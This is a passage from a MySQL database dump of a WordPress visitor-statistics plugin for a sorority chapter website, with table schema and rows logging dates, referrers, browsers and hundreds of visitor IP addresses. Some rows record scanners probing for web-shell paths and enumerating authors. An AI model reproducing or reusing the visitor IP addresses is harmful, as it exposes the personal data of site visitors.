20:07:26','2018-07-27',103),(532,'2018-07-28 20:09:09','2018-07-28',90),(533,'2018-07-29 20:24:28','2018-07-29',98),(534,'2018-07-30 19:41:54','2018-07-30',96),(535,'2018-07-31 20:04:33','2018-07-31',267),(536,'2018-08-01 17:59:19','2018-08-01',93),(537,'2018-08-02 20:06:09','2018-08-02',84),(538,'2018-08-03 20:10:31','2018-08-03',61),(539,'2018-08-04 18:39:35','2018-08-04',88),(540,'2018-08-05 20:03:13','2018-08-05',40),(541,'2018-08-06 20:20:21','2018-08-06',110),(542,'2018-08-07 20:15:25','2018-08-07',109),(543,'2018-08-08 19:51:49','2018-08-08',97),(544,'2018-08-09 19:24:36','2018-08-09',98),(545,'2018-08-10 19:00:24','2018-08-10',102),(546,'2018-08-11 20:05:15','2018-08-11',74),(547,'2018-08-12 19:39:10','2018-08-12',142),(548,'2018-08-13 00:16:15','2018-08-13',3);
/*!40000 ALTER TABLE `lwz_statistics_visit` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_visitor`
--

DROP TABLE IF EXISTS `lwz_statistics_visitor`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_visitor` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `last_counter` date NOT NULL,
  `referred` text NOT NULL,
  `agent` varchar(255) NOT NULL,
  `platform` varchar(255) DEFAULT NULL,
  `version` varchar(255) DEFAULT NULL,
  `UAString` varchar(255) DEFAULT NULL,
  `ip` varchar(60) NOT NULL,
  `location` varchar(10) DEFAULT NULL,
  `hits` int(11) DEFAULT NULL,
  `honeypot` int(11) DEFAULT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `date_ip_agent` (`last_counter`,`ip`,`agent`(75),`platform`(75),`version`(75)),
  KEY `agent` (`agent`),
  KEY `platform` (`platform`),
  KEY `version` (`version`),
  KEY `location` (`location`)
) ENGINE=MyISAM AUTO_INCREMENT=34724 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_visitor`
--

LOCK TABLES `lwz_statistics_visitor` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_visitor` DISABLE KEYS */;
INSERT INTO `lwz_statistics_visitor` VALUES (1,'2017-02-02','http://zphiblgz.org/wp-admin/update.php?action=upload-plugin','Chrome','Windows','55.0.2883.87',NULL,'204.126.132.241','000',NULL,NULL),(2,'2017-02-02','http://zphiblgz.org/wp-content/uploads/page.php','Chrome','Windows','48.0.2564.116','','178.159.37.84','000',1,0),(3,'2017-02-02','http://zphiblgz.org','Firefox','Windows','29.0','','191.102.255.24','000',2,0),(4,'2017-02-02','http://zphiblgz.org/logs.php','Firefox','Windows','44.0','','178.159.37.84','000',4,0),(5,'2017-02-02','http://zphiblgz.org/wp-content/uploads/help.php','Firefox','Windows','43.0','','178.159.37.84','000',3,0),(6,'2017-02-02','http://zphiblgz.org','Firefox','Windows','40.1','','177.98.236.246','000',2,0),(7,'2017-02-02','http://zphiblgz.org/wp-content/uploads/logs.php','Chrome','Windows','47.0.2526.111','','178.159.37.84','000',4,0),(8,'2017-02-02','http://zphiblgz.org/plagmain.php','Chrome','Windows','48.0.2564.103','','178.159.37.84','000',1,0),(9,'2017-02-02','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','173.64.114.209','000',4,0),(10,'2017-02-02','http://zphiblgz.org','Safari','iPhone','10.0','','174.227.0.229','000',3,0),(11,'2017-02-02','http://zphiblgz.org/wp-content/uploads/404.php','Opera Next','Windows','34.0.2036.50','','178.159.37.84','000',1,0),(12,'2017-02-02','http://zphiblgz.org/wp-content/themes/vent-fitness/help.php','Chrome','Windows','48.0.2564.109','','178.159.37.84','000',1,0),(13,'2017-02-02','http://zphiblgz.org/wp-engines.php','Chrome','Windows','46.0.2490.86','','178.159.37.84','000',1,0),(14,'2017-02-03','http://zphiblgz.org','Firefox','Windows','40.1','','190.17.16.238','000',1,0),(15,'2017-02-03','http://zphiblgz.org','Safari','iPhone','10.0','','208.54.37.189','000',3,0),(16,'2017-02-03','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(17,'2017-02-03','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','50.225.39.81','000',10,0),(18,'2017-02-03','http://zphiblgz.org','Firefox','Windows','40.1','','117.207.118.95','000',2,0),(19,'2017-02-03','http://zphiblgz.org/wp-content/themes/metro-rate/db.php','MSIE','Windows','6.0','','36.85.74.175','000',1,0),(20,'2017-02-03','http://www.zphibmaryland.org/chapters/','Firefox','Windows','51.0','','71.179.27.243','000',4,0),(21,'2017-02-03','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','50.225.39.81','000',5,0),(22,'2017-02-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(23,'2017-02-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(24,'2017-02-03','http://zphiblgz.org/event/4th-annual-denim-pearlz-party/','Safari','iPhone','10.0','','208.54.35.224','000',1,0),(25,'2017-02-03','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.65.111','000',1,0),(26,'2017-02-03','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',1,0),(27,'2017-02-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.172.225','000',15,0),(28,'2017-02-03','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.172.225','000',1,0),(29,'2017-02-03','zphiblgz.org','Firefox','Windows','5.0.1','','77.222.61.176','000',1,0),(30,'2017-02-03','https://www.google.com/','Chrome','Windows','55.0.2883.87','','71.84.49.233','000',3,0),(31,'2017-02-04','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(32,'2017-02-04','http://zphiblgz.org','Firefox','Windows','40.1','','109.93.163.56','000',5,0),(33,'2017-02-04','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(34,'2017-02-04','http://zphiblgz.org/','MSIE','Windows','11.0','','208.167.254.237','000',1,0),(35,'2017-02-04','http://zphiblgz.org/?author=%7Bnum:4%7D','MSIE','Windows','6.0','','188.163.110.81','000',1,0),(36,'2017-02-04','http://zphiblgz.org/wp-content/db-update.php','MSIE','Windows','6.0','','1.20.156.68','000',1,0),(37,'2017-02-04','http://zphiblgz.org/','Firefox','Windows','32.0','','123.97.12.0','000',1,0),(38,'2017-02-04','http://zphiblgz.org/','Firefox','Windows','32.0','','69.1.28.181','000',2,0),(39,'2017-02-04','http://zphiblgz.org','Firefox','Windows','32.0','','192.198.80.227','000',2,0),(40,'2017-02-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',6,0),(41,'2017-02-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(42,'2017-02-04','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','173.69.144.23','000',1,0),(43,'2017-02-04','https://www.bing.com/','Chrome','Windows','55.0.2883.87','','71.178.177.148','000',2,0),(44,'2017-02-04','https://www.google.com/','Edge','Windows','12.10240','','71.121.245.147','000',1,0),(45,'2017-02-04','http://www.google.com/','Chrome','Android','54.0.2840.85','','100.16.224.184','000',7,0),(46,'2017-02-04','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Safari','iPhone','5.1','','5.61.33.81','000',1,0),(47,'2017-02-04','http://zphiblgz.org/wp-admin/','Chrome','Windows','24.0.1312.57','','5.61.33.81','000',1,0),(48,'2017-02-04','https://search.yahoo.com/','Chrome','Windows','55.0.2883.87','','72.81.227.173','000',9,0),(49,'2017-02-04','http://zphiblgz.org','Firefox','Linux','47.0','','72.81.227.173','000',6,0),(50,'2017-02-04','http://zphiblgz.org','Firefox','Windows','50.0','','72.81.227.173','000',2,0),(51,'2017-02-04','http://zphiblgz.org','Firefox','Windows','29.0','','201.186.200.144','000',2,0),(52,'2017-02-04','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.181.168','000',1,0),(53,'2017-02-04','android-app://com.google.android.googlequicksearchbox','Chrome','Android','55.0.2883.91','','166.216.165.21','000',6,0),(54,'2017-02-04','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','54.90.41.238','000',1,0),(55,'2017-02-04','http://zphiblgz.org','Firefox','Windows','43.0','','23.106.26.4','000',2,0),(56,'2017-02-04','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','163.172.16.251','000',1,0),(57,'2017-02-04','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','104.129.194.127','000',4,0),(58,'2017-02-05','https://www.google.com/','Safari','iPhone','10.0','','24.0.101.192','000',1,0),(59,'2017-02-05','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','176.126.252.12','000',1,0),(60,'2017-02-05','http://www.google.com/','Chrome','Android','55.0.2883.91','','71.178.244.174','000',2,0),(61,'2017-02-05','http://www.zphibmaryland.org/chapters/','Chrome','Android','51.0.2704.106','','71.244.183.121','000',6,0),(62,'2017-02-05','http://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.23','000',1,0),(63,'2017-02-05','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',2,0),(64,'2017-02-05','http://zphiblgz.org','Safari','iPhone','9.0','','66.87.81.92','000',3,0),(65,'2017-02-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(66,'2017-02-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(67,'2017-02-05','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','195.154.181.15','000',1,0),(68,'2017-02-05','https://www.google.com/','Chrome','Android','54.0.2840.85','','174.205.10.25','000',5,0),(69,'2017-02-05','https://www.google.com/','Chrome','Linux','48.0.2564.10','','74.92.159.241','000',5,0),(70,'2017-02-05','http://zphiblgz.org','Firefox','Windows','29.0','','110.36.42.35','000',2,0),(71,'2017-02-05','http://zphiblgz.org/scholarship/application/','Chrome','Windows','55.0.2883.87','','72.81.227.173','000',1,0),(72,'2017-02-05','http://zphiblgz.org','Firefox','Linux','47.0','','72.81.227.173','000',2,0),(73,'2017-02-05','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','146.185.138.228','000',2,0),(74,'2017-02-06','http://zphiblgz.org','panscient','Unknown','Unknown','','72.79.57.172','000',252,0),(75,'2017-02-06','http://zphiblgz.org','Firefox','Windows','40.1','','112.200.249.75','000',2,0),(76,'2017-02-06','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','50.225.39.81','000',5,0),(77,'2017-02-06','http://zphiblgz.org','Firefox','Windows','40.1','','151.16.145.46','000',2,0),(78,'2017-02-06','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',2,0),(79,'2017-02-06','https://www.google.com/','Chrome','Android','44.0.2403.133','','166.216.165.22','000',1,0),(80,'2017-02-06','http://zphiblgz.org','Firefox','Macintosh','45.0','','91.107.105.132','000',1,0),(81,'2017-02-06','http://zphiblgz.org','Firefox','Windows','33.0','','185.146.168.146','000',1,0),(82,'2017-02-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(83,'2017-02-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(84,'2017-02-06','http://zphiblgz.org','Firefox','Windows','29.0','','85.12.229.10','000',2,0),(85,'2017-02-06','http://zphiblgz.org','Firefox','Windows','40.1','','85.244.37.209','000',2,0),(86,'2017-02-06','http://zphiblgz.org','Faraday','Unknown','Unknown','','54.161.234.105','000',2,0),(87,'2017-02-06','http://zphiblgz.org','Safari','Linux','538.1','','54.235.230.84','000',2,0),(88,'2017-02-06','http://zphiblgz.org','Ruby','Unknown','Unknown','','54.161.234.105','000',2,0),(89,'2017-02-06','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','204.126.132.241','000',2,0),(90,'2017-02-06','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','163.172.16.251','000',1,0),(91,'2017-02-06','http://zphiblgz.org','Firefox','Linux','14.0.1','','136.243.17.161','000',1,0),(92,'2017-02-06','http://m.facebook.com/','Chrome','Android','52.0.2743.98','','172.58.185.52','000',5,0),(93,'2017-02-06','https://www.google.com/','Chrome','Android','44.0.2403.133','','166.137.240.76','000',2,0),(94,'2017-02-06','https://m.facebook.com/','Chrome','Android','56.0.2924.87','','172.58.185.100','000',1,0),(95,'2017-02-06','http://zphiblgz.org','Safari','iPad','10.0','','68.33.90.66','000',3,0),(96,'2017-02-06','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(97,'2017-02-06','http://zphiblgz.org','Firefox','Windows','40.1','','201.240.119.177','000',1,0),(98,'2017-02-07','http://zphiblgz.org','Chrome','Macintosh','11.0.672.2','','80.11.19.74','000',1,0),(99,'2017-02-07','http://zphiblgz.org','Chrome','Linux','10.0.648.0','','80.11.19.74','000',1,0),(100,'2017-02-07','http://zphiblgz.org','Chrome','Windows','10.0.648.134','','80.11.19.74','000',1,0),(101,'2017-02-07','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','80.11.19.74','000',1,0),(102,'2017-02-07','http://zphiblgz.org','Chrome','Linux','14.0.803.0','','80.11.19.74','000',2,0),(103,'2017-02-07','http://zphiblgz.org','Chrome','Windows','11.0.661.0','','80.11.19.74','000',2,0),(104,'2017-02-07','http://zphiblgz.org','Chrome','Windows','12.0.742.100','','80.11.19.74','000',1,0),(105,'2017-02-07','http://zphiblgz.org','Chrome','Linux','17.0.963.65','','80.11.19.74','000',1,0),(106,'2017-02-07','http://zphiblgz.org','Chrome','Macintosh','14.0.794.0','','80.11.19.74','000',1,0),(107,'2017-02-07','http://zphiblgz.org','Chrome','Linux','18.0.1025.142','','80.11.19.74','000',1,0),(108,'2017-02-07','http://zphiblgz.org','Chrome','Linux','10.0.626.0','','80.11.19.74','000',1,0),(109,'2017-02-07','http://zphiblgz.org','Chrome','Macintosh','17.0.963.65','','80.11.19.74','000',1,0),(110,'2017-02-07','http://zphiblgz.org','Chrome','Windows','12.0.704.0','','80.11.19.74','000',1,0),(111,'2017-02-07','http://zphiblgz.org','Chrome','Linux','11.0.686.3','','80.11.19.74','000',1,0),(112,'2017-02-07','http://zphiblgz.org','Chrome','Windows','14.0.810.0','','80.11.19.74','000',1,0),(113,'2017-02-07','http://zphiblgz.org','Chrome','Linux','13.0.764.0','','80.11.19.74','000',1,0),(114,'2017-02-07','http://zphiblgz.org','Chrome','Macintosh','12.0.742.100','','80.11.19.74','000',1,0),(115,'2017-02-07','http://zphiblgz.org/wp-content/plugins/posts-in-page/assets/posts_in_page_help_view.php','MSIE','Windows','6.0','','83.110.225.81','000',1,0),(116,'2017-02-07','http://zphiblgz.org','Firefox','Windows','29.0','','206.214.15.44','000',2,0),(117,'2017-02-07','http://zphiblgz.org','MSIE','Windows','11.0','','88.99.57.125','000',2,0),(118,'2017-02-07','http://zphiblgz.org/membership/','MSIE','Windows','11.0','','190.104.178.46','000',1,0),(119,'2017-02-07','http://zphiblgz.org','Firefox','Windows','40.1','','99.49.86.250','000',1,0),(120,'2017-02-07','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','192.3.177.126','000',35,0),(121,'2017-02-07','http://zphiblgz.org','Safari','iPhone','9.0','','36.110.147.70','000',2,0),(122,'2017-02-07','http://m.facebook.com','AppleWebKit','iPhone','602.3.12','','73.172.113.1','000',4,0),(123,'2017-02-07','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(124,'2017-02-07','http://zphiblgz.org','Safari','iPhone','10.0','','172.56.35.77','000',3,0),(125,'2017-02-07','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.34.51','000',1,0),(126,'2017-02-07','http://zphiblgz.org/wp-admin/','MSIE','Windows','8.0','','5.61.34.51','000',1,0),(127,'2017-02-07','http://zphiblgz.org','Firefox','Windows','40.1','','188.27.55.35','000',2,0),(128,'2017-02-07','http://zphiblgz.org/config.php','Chrome','Windows','5.0.375.99','','212.193.234.176','000',9,0),(129,'2017-02-07','http://zphiblgz.org','Microsoft','Unknown','Unknown','','204.126.132.241','000',4,0),(130,'2017-02-07','http://zphiblgz.org','MSIE','Windows','7.0','','204.126.132.241','000',4,0),(131,'2017-02-07','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',7,0),(132,'2017-02-07','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.183.187','000',7,0),(133,'2017-02-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',7,0),(134,'2017-02-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(135,'2017-02-07','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','69.243.6.118','000',1,0),(136,'2017-02-07','zphiblgz.org','Firefox','Windows','23.0','','89.253.231.189','000',1,0),(137,'2017-02-07','https://www.google.com/','Safari','iPhone','10.0','','150.182.180.158','000',1,0),(138,'2017-02-07','http://zphiblgz.org','Chrome','Linux','33.0.1750.152','','205.164.45.51','000',1,0),(139,'2017-02-07','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(140,'2017-02-07','http://zphiblgz.org','Firefox','Windows','40.0','','195.22.127.140','000',1,0),(141,'2017-02-07','https://outlook.live.com/','Firefox','Windows','51.0','','108.48.60.106','000',1,0),(142,'2017-02-07','http://zphiblgz.org','Safari','iPhone','10.0','','72.83.218.87','000',7,0),(143,'2017-02-07','http://zphiblgz.org','Chrome','Android','55.0.2883.91','','174.205.2.97','000',1,0),(144,'2017-02-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','45.56.147.151','000',1,0),(145,'2017-02-07','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','5.39.219.2','000',3,0),(146,'2017-02-07','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.10','000',1,0),(147,'2017-02-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',2,0),(148,'2017-02-08','http://zphiblgz.org','Firefox','Windows','40.1','','2.226.178.118','000',2,0),(149,'2017-02-08','http://zphiblgz.org','Firefox','Windows','3.5.1','','46.51.194.107','000',1,0),(150,'2017-02-08','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.128.51','000',1,0),(151,'2017-02-08','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','170.130.98.83','000',2,0),(152,'2017-02-08','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','63.223.79.108','000',2,0),(153,'2017-02-08','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',1,0),(154,'2017-02-08','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',2,0),(155,'2017-02-08','http://zphiblgz.org','Chrome','Windows','43.0.2357.81','','38.140.157.84','000',2,0),(156,'2017-02-08','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.234.180.28','000',2,0),(157,'2017-02-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(158,'2017-02-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(159,'2017-02-08','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','73.173.227.96','000',1,0),(160,'2017-02-08','http://zphiblgz.org','Firefox','Windows','40.1','','66.176.73.245','000',1,0),(161,'2017-02-08','http://zphiblgz.org','xmlrpclib','Unknown','Unknown','','51.15.43.202','000',3,0),(162,'2017-02-08','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(163,'2017-02-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.247.8.208','000',1,0),(164,'2017-02-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.59.16.222','000',1,0),(165,'2017-02-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.201','000',1,0),(166,'2017-02-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','146.255.26.241','000',1,0),(167,'2017-02-08','https://www.bing.com/','Edge','Windows','14.14393','','68.33.84.156','000',1,0),(168,'2017-02-09','http://zphiblgz.org','Firefox','Windows','40.1','','202.125.142.196','000',2,0),(169,'2017-02-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(170,'2017-02-09','https://www.google.com/','Chrome','Windows','56.0.2924.87','','32.215.8.79','000',1,0),(171,'2017-02-09','http://zphiblgz.org','Firefox','Windows','40.1','','27.49.48.191','000',2,0),(172,'2017-02-09','http://www.zphibmaryland.org/chapters/','Chrome','Windows','56.0.2924.87','','45.37.106.28','000',6,0),(173,'2017-02-09','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','208.94.226.169','000',1,0),(174,'2017-02-09','http://zphiblgz.org/event/4th-annual-denim-pearlz-party/','Safari','iPhone','10.0','','38.127.129.2','000',1,0),(175,'2017-02-09','https://www.google.com/','Chrome','Windows','56.0.2924.87','','130.85.245.36','000',1,0),(176,'2017-02-09','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','134.249.159.113','000',1,0),(177,'2017-02-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',47,0),(178,'2017-02-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',6,0),(179,'2017-02-09','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','181.214.209.16','000',1,0),(180,'2017-02-09','http://zphiblgz.org','Firefox','Windows','40.1','','60.54.30.108','000',1,0),(181,'2017-02-09','http://contentpromotion.pitchbox.com/task/communication_content?communication_id=3381179','Chrome','Windows','56.0.2924.87','','49.151.45.196','000',2,0),(182,'2017-02-09','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','198.20.69.74','000',1,0),(183,'2017-02-09','zphiblgz.org','Chrome','Macintosh','24.0.1312.57','','212.224.112.225','000',1,0),(184,'2017-02-10','http://zphiblgz.org','python-requests','Unknown','2.6.0','','212.227.91.68','000',2,0),(185,'2017-02-10','http://www.zphibmaryland.org/chapters/','Edge','Windows','14.14393','','68.134.64.123','000',34,0),(186,'2017-02-10','https://www.google.com/','Chrome','Windows','56.0.2924.87','','128.205.246.143','000',1,0),(187,'2017-02-10','http://zphiblgz.org','MSIE','Windows','11.0','','107.20.125.57','000',1,0),(188,'2017-02-10','http://zphiblgz.org','Firefox','Windows','40.1','','190.190.241.4','000',1,0),(189,'2017-02-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',2,0),(190,'2017-02-10','http://www.bing.com/search?q=zeta+phi+beta+sorority+inc+howard+county+md&src=IE-TopResult&FORM=IETR02&conversationid=','MSIE','Windows','11.0','','104.129.194.75','000',6,0),(191,'2017-02-10','http://zphiblgz.org','Firefox','Windows','40.1','','39.40.19.176','000',2,0),(192,'2017-02-10','http://zphiblgz.org','Firefox','Windows','50.0','','95.79.169.147','000',1,0),(193,'2017-02-10','https://www.facebook.com/','Chrome','Windows','56.0.2924.76','','131.118.144.252','000',3,0),(194,'2017-02-10','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',8,0),(195,'2017-02-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',6,0),(196,'2017-02-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(197,'2017-02-10','http://zphiblgz.org','python-requests','Unknown','2.6.0','','204.93.208.247','000',2,0),(198,'2017-02-10','https://www.google.com/','Safari','iPad','9.0','','73.128.166.17','000',16,0),(199,'2017-02-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.34','000',1,0),(200,'2017-02-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.55','000',1,0),(201,'2017-02-10','https://www.google.com/','Safari','iPhone','10.0','','172.56.3.243','000',2,0),(202,'2017-02-11','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','107.172.144.82','000',2,0),(203,'2017-02-11','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Chrome','Windows','39.0.2171.95','','23.94.21.140','000',1,0),(204,'2017-02-11','http://zphiblgz.org/','Chrome','Windows','48.0.2564.109','','109.86.71.234','000',1,0),(205,'2017-02-11','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','204.12.240.34','000',2,0),(206,'2017-02-11','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(207,'2017-02-11','http://zphiblgz.org/?author=1','Firefox','Windows','50.0','','185.129.148.239','000',12,0),(208,'2017-02-11','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','93.115.95.201','000',1,0),(209,'2017-02-11','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.181.168','000',1,0),(210,'2017-02-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.57','000',19,0),(211,'2017-02-11','http://zphiblgz.org','Chrome','Android','41.0.2272.96','','69.58.178.57','000',1,0),(212,'2017-02-11','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(213,'2017-02-11','http://zphiblgz.org','Firefox','Windows','29.0','','110.172.188.3','000',2,0),(214,'2017-02-11','http://zphiblgz.org','Firefox','Windows','29.0','','80.120.155.226','000',2,0),(215,'2017-02-11','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.202.23.166','000',2,0),(216,'2017-02-11','http://zphiblgz.org','python-requests','Unknown','2.6.0','','204.93.208.247','000',2,0),(217,'2017-02-11','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','158.85.184.106','000',2,0),(218,'2017-02-11','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','95.85.2.100','000',1,0),(219,'2017-02-11','http://zphiblgz.org/','Safari','iPhone','10.0','','71.191.213.230','000',1,0),(220,'2017-02-11','http://www.google.com/','Chrome','Android','53.0.2785.124','','172.56.26.253','000',1,0),(221,'2017-02-11','http://zphiblgz.org','SalesIntelligent','Unknown','Unknown','','54.144.56.180','000',3,0),(222,'2017-02-11','http://m.facebook.com','AppleWebKit','iPhone','602.3.12','','173.73.248.148','000',7,0),(223,'2017-02-11','http://zphiblgz.org','Firefox','Windows','29.0','','187.16.55.215','000',2,0),(224,'2017-02-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(225,'2017-02-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(226,'2017-02-11','http://zphiblgz.org','Firefox','Windows','40.1','','95.15.225.135','000',2,0),(227,'2017-02-11','http://zphiblgz.org','Firefox','Windows','29.0','','182.73.189.230','000',2,0),(228,'2017-02-11','http://www.bing.com/search?q=phi+beta+sigma+chapter+howard+county&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.26','000',1,0),(229,'2017-02-11','http://zphiblgz.org/scholarship/','Safari','Macintosh','6.2.8','','96.244.100.67','000',1,0),(230,'2017-02-11','https://www.google.com/','Safari','iPhone','10.0','','173.73.83.159','000',4,0),(231,'2017-02-11','https://www.tattooreligion.ru/','MSIE','Windows','6.0','','46.211.196.121','000',3,0),(232,'2017-02-11','http://zphiblgz.org','Opera Next','Windows','26.0.1656.60','','204.12.240.34','000',1,0),(233,'2017-02-12','http://zphiblgz.org','Chrome','Linux','12.0.742.100','','176.31.126.56','000',2,0),(234,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.56.71.55','000',1,0),(235,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','23.254.161.36','000',1,0),(236,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.46.81.8','000',1,0),(237,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','194.247.30.43','000',1,0),(238,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.118.8','000',1,0),(239,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.180','000',1,0),(240,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.136.88.220','000',1,0),(241,'2017-02-12','http://zphiblgz.org','Firefox','Windows','3.6.3','','13.112.121.62','000',1,0),(242,'2017-02-12','http://zphiblgz.org','Firefox','Windows','40.1','','27.147.205.216','000',2,0),(243,'2017-02-12','http://zphiblgz.org','Opera 